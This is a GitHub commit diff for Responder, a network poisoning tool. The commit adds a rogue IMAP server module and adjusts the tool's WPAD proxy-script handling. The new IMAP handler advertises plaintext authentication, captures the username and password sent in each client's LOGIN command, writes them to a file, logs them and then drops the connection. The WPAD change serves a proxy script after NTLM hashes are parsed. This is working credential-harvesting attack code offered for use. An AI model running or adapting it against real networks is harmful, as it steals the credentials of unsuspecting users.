github/Responder
1
0
Fork 0
mirror of https://github.com/lgandx/Responder.git synced 2025-07-06 13:01:24 -07:00
Code Issues Projects Releases Packages Wiki Activity Actions

Added: IMAP module and enhanced wpad.

Browse source
This commit is contained in:
lgandx 2013-12-30 19:17:48 -05:00
parent bf17eec806
commit af60de9567
3 changed files with 103 additions and 5 deletions
Download patch file Download diff file Expand all files Collapse all files

55
IMAPPackets.py Normal file
View file

@ -0,0 +1,55 @@
#! /usr/bin/env python
# NBT-NS/LLMNR Responder
# Created by Laurent Gaffie
# Copyright (C) 2013 Trustwave Holdings, Inc.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import struct
from odict import OrderedDict
class Packet():
fields = OrderedDict([
("data", ""),
])
def __init__(self, **kw):
self.fields = OrderedDict(self.__class__.fields)
for k,v in kw.items():
if callable(v):
self.fields[k] = v(self.fields[k])
else:
self.fields[k] = v
def __str__(self):
return "".join(map(str, self.fields.values()))
#IMAP4 Greating class
class IMAPGreating(Packet):
fields = OrderedDict([
("Code", "* OK IMAP4 service is ready."),
("CRLF", "\r\n"),
])
#IMAP4 Capability class
class IMAPCapability(Packet):
fields = OrderedDict([
("Code", "* CAPABILITY IMAP4 IMAP4rev1 AUTH=PLAIN"),
("CRLF", "\r\n"),
])
#IMAP4 Capability class
class IMAPCapabilityEnd(Packet):
fields = OrderedDict([
("Tag", ""),
("Message", " OK CAPABILITY completed."),
("CRLF", "\r\n"),
])

3
Responder.conf
View file

@ -6,7 +6,8 @@ SMB = On
FTP = On FTP = On
POP = On POP = On
;;Listen on 25/TCP, 587/TCP ;;Listen on 25/TCP, 587/TCP
SMTP = On SMTP = On
IMAP = On
HTTP = On HTTP = On
HTTPS = On HTTPS = On
DNS = On DNS = On

50
Responder.py
View file

@ -62,6 +62,7 @@ SMB_On_Off = config.get('Responder Core', 'SMB').upper()
SQL_On_Off = config.get('Responder Core', 'SQL').upper() SQL_On_Off = config.get('Responder Core', 'SQL').upper()
FTP_On_Off = config.get('Responder Core', 'FTP').upper() FTP_On_Off = config.get('Responder Core', 'FTP').upper()
POP_On_Off = config.get('Responder Core', 'POP').upper() POP_On_Off = config.get('Responder Core', 'POP').upper()
IMAP_On_Off = config.get('Responder Core', 'IMAP').upper()
SMTP_On_Off = config.get('Responder Core', 'SMTP').upper() SMTP_On_Off = config.get('Responder Core', 'SMTP').upper()
LDAP_On_Off = config.get('Responder Core', 'LDAP').upper() LDAP_On_Off = config.get('Responder Core', 'LDAP').upper()
DNS_On_Off = config.get('Responder Core', 'DNS').upper() DNS_On_Off = config.get('Responder Core', 'DNS').upper()
@ -162,7 +163,7 @@ Challenge = ""
for i in range(0,len(NumChal),2): for i in range(0,len(NumChal),2):
Challenge += NumChal[i:i+2].decode("hex") Challenge += NumChal[i:i+2].decode("hex")
Show_Help("[+]NBT-NS & LLMNR responder started\n[+]Loading Responder.conf File..\nGlobal Parameters set:\nResponder is bound to this interface:%s\nChallenge set is:%s\nWPAD Proxy Server is:%s\nWPAD script loaded:%s\nHTTP Server is:%s\nHTTPS Server is:%s\nSMB Server is:%s\nSMB LM support is set to:%s\nSQL Server is:%s\nFTP Server is:%s\nPOP3 Server is:%s\nSMTP Server is:%s\nDNS Server is:%s\nLDAP Server is:%s\nFingerPrint Module is:%s\nServing Executable via HTTP&WPAD is:%s\nAlways Serving a Specific File via HTTP&WPAD is:%s\n\n"%(BIND_TO_Interface, NumChal,WPAD_On_Off,WPAD_Script,On_Off,SSL_On_Off,SMB_On_Off,LM_On_Off,SQL_On_Off,FTP_On_Off,POP_On_Off,SMTP_On_Off,DNS_On_Off,LDAP_On_Off,Finger_On_Off,Exe_On_Off,Exec_Mode_On_Off)) Show_Help("[+]NBT-NS & LLMNR responder started\n[+]Loading Responder.conf File..\nGlobal Parameters set:\nResponder is bound to this interface:%s\nChallenge set is:%s\nWPAD Proxy Server is:%s\nWPAD script loaded:%s\nHTTP Server is:%s\nHTTPS Server is:%s\nSMB Server is:%s\nSMB LM support is set to:%s\nSQL Server is:%s\nFTP Server is:%s\nIMAP Server is:%s\nPOP3 Server is:%s\nSMTP Server is:%s\nDNS Server is:%s\nLDAP Server is:%s\nFingerPrint Module is:%s\nServing Executable via HTTP&WPAD is:%s\nAlways Serving a Specific File via HTTP&WPAD is:%s\n\n"%(BIND_TO_Interface, NumChal,WPAD_On_Off,WPAD_Script,On_Off,SSL_On_Off,SMB_On_Off,LM_On_Off,SQL_On_Off,FTP_On_Off,IMAP_On_Off,POP_On_Off,SMTP_On_Off,DNS_On_Off,LDAP_On_Off,Finger_On_Off,Exe_On_Off,Exec_Mode_On_Off))
#Simple NBNS Services. #Simple NBNS Services.
W_REDIRECT = "\x41\x41\x00" W_REDIRECT = "\x41\x41\x00"
@ -1109,9 +1110,14 @@ def PacketSequence(data,client):
if packetNtlm == "\x03": if packetNtlm == "\x03":
NTLM_Auth= b64decode(''.join(a)) NTLM_Auth= b64decode(''.join(a))
ParseHTTPHash(NTLM_Auth,client) ParseHTTPHash(NTLM_Auth,client)
buffer1 = IIS_Auth_Granted(Payload=config.get('HTTP Server','HTMLToServe')) if re.search('(/wpad.dat|/*\.pac)', data):
buffer1.calculate() buffer1 = WPADScript(Payload=WPAD_Script) #Fix login prompt for wpad.
return str(buffer1) buffer1.calculate()
return str(buffer1)
else:
buffer1 = IIS_Auth_Granted(Payload=config.get('HTTP Server','HTMLToServe'))
buffer1.calculate()
return str(buffer1)
if b: if b:
GrabCookie(data,client) GrabCookie(data,client)
GrabURL(data,client) GrabURL(data,client)
@ -1589,6 +1595,34 @@ class ESMTP(BaseRequestHandler):
pass pass
################################################################################## ##################################################################################
#IMAP4 Stuff
##################################################################################
from IMAPPackets import *
#ESMTP server class.
class IMAP(BaseRequestHandler):
def handle(self):
try:
self.request.send(str(IMAPGreating()))
data = self.request.recv(1024)
if data[5:15] == "CAPABILITY":
RequestTag = data[0:4]
self.request.send(str(IMAPCapability()))
self.request.send(str(IMAPCapabilityEnd(Tag=RequestTag)))
data = self.request.recv(1024)
if data[5:10] == "LOGIN":
Credentials = data[10:].strip()
Outfile = os.path.join(ResponderPATH,"IMAP-Clear-Text-Password-"+self.client_address[0]+".txt")
WriteData(Outfile,Credentials, Credentials)
print '[+]IMAP Credentials from %s. ("User" "Pass"): %s'%(self.client_address[0],Credentials)
logging.warning('[+]IMAP Credentials from %s. ("User" "Pass"): %s'%(self.client_address[0],Credentials))
self.request.send(str(ditchthisconnection()))
data = self.request.recv(1024)
except Exception:
pass
##################################################################################
#Loading the servers #Loading the servers
################################################################################## ##################################################################################
@ -1658,6 +1692,13 @@ def Is_SMTP_On(SMTP_On_Off):
if SMTP_On_Off == "OFF": if SMTP_On_Off == "OFF":
return False return False
#Function name self-explanatory
def Is_IMAP_On(IMAP_On_Off):
if IMAP_On_Off == "ON":
return thread.start_new(serve_thread_tcp,('', 143,IMAP))
if IMAP_On_Off == "OFF":
return False
#Function name self-explanatory #Function name self-explanatory
def Is_DNS_On(DNS_On_Off): def Is_DNS_On(DNS_On_Off):
if DNS_On_Off == "ON": if DNS_On_Off == "ON":
@ -1722,6 +1763,7 @@ def main():
Is_DNS_On(DNS_On_Off) Is_DNS_On(DNS_On_Off)
Is_POP_On(POP_On_Off) Is_POP_On(POP_On_Off)
Is_SMTP_On(SMTP_On_Off) Is_SMTP_On(SMTP_On_Off)
Is_IMAP_On(IMAP_On_Off)
#Browser listener loaded by default #Browser listener loaded by default
thread.start_new(serve_thread_udp,('', 138,Browser)) thread.start_new(serve_thread_udp,('', 138,Browser))
## Poisoner loaded by default, it's the purpose of this tool... ## Poisoner loaded by default, it's the purpose of this tool...